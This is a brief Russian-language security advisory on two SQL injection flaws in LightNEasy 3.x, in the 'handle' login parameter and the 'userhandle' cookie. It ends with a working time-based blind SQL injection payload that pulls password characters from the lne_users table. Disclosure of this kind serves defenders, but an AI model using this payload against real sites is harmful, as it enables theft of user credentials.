Программа: LightNEasy 3.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "handle" через сценарий LightNEasy.php сценарием LightNEasy/common.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.
2) Уязвимость существует из-за недостаточной обработки входных данных в "userhandle"
cookie через сценарий LightNEasy.php сценарием LightNEasy/common.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
URL: http://localhost/LNE/LightNEasy.php?do=login
Postdata:
handle=" UNION SELECT IF(SUBSTRING(password,1 ,1) = CHAR(98), BENCHMARK(1000000,
ENCODE('Slow','Down')), null),2,3,4,5,6,7,8,9,10,11 FROM lne_users WHERE id="1&password=&do=login&=Login
